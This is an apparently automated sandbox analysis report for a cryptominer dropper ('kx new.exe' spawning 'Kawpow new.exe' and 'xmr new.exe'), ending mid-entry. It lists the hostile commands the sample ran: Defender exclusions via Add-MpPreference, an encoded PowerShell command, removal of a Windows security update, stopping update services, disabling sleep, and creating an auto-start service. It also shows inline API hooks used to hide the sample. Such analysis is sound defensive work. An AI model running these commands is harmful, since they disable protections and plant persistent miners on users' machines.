                      NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                      NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                      ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                      Function Name | Hook Type | New Data
                      ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                      ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                      NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                      ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                      RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                      NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                      NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                      ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                      ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                      Target ID:0
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Users\user\Desktop\kx new.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\kx new.exe"
                      Imagebase:0x400000
                      File size:10'948'608 bytes
                      MD5 hash:D9D13FA25E880665FB471A4BE57C494C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
                      Imagebase:0xe20000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:3
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:10:09:10
                      Start date:07/01/2025
                      Path:C:\Users\user\AppData\Local\Temp\Kawpow new.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
                      Imagebase:0x7ff7dd370000
                      File size:5'471'744 bytes
                      MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 74%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:5
                      Start time:10:09:11
                      Start date:07/01/2025
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Imagebase:0x7ff6cb6b0000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:10:09:11
                      Start date:07/01/2025
                      Path:C:\Users\user\AppData\Local\Temp\xmr new.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Local\Temp\xmr new.exe"
                      Imagebase:0x7ff7a4db0000
                      File size:5'471'744 bytes
                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 74%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:10:09:11
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:10:09:12
                      Start date:07/01/2025
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Imagebase:0x7ff6cb6b0000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:10:09:12
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:10:09:13
                      Start date:07/01/2025
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff605670000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:11
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7f26b0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:14
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7f26b0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:15
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:16
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:17
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:18
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:19
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\wusa.exe
                      Wow64 process (32bit):false
                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7749c0000
                      File size:345'088 bytes
                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:20
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\wusa.exe
                      Wow64 process (32bit):false
                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                      Imagebase:0x7ff7749c0000
                      File size:345'088 bytes
                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:21
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:22
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:24
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:25
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:26
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:27
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:28
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:29
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop bits
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:30
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:31
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop bits
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:32
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:33
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:34
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:35
                      Start time:10:09:18
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:36
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:37
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:38
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:39
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:40
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:41
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:42
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:43
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:44
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:45
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\dialer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\dialer.exe
                      Imagebase:0x7ff7fd750000
                      File size:39'936 bytes
                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:46
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:47
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:48
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:49
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:50
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:51
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\powercfg.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Imagebase:0x7ff7dad90000
                      File size:96'256 bytes
                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:52
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\dialer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\dialer.exe
                      Imagebase:0x7ff7fd750000
                      File size:39'936 bytes
                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:53
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:54
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:55
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:56
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe delete "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:57
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:58
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:59
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\winlogon.exe
                      Wow64 process (32bit):false
                      Commandline:winlogon.exe
                      Imagebase:0x7ff6cc5a0000
                      File size:906'240 bytes
                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Target ID:60
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:61
                      Start time:10:09:20
                      Start date:07/01/2025
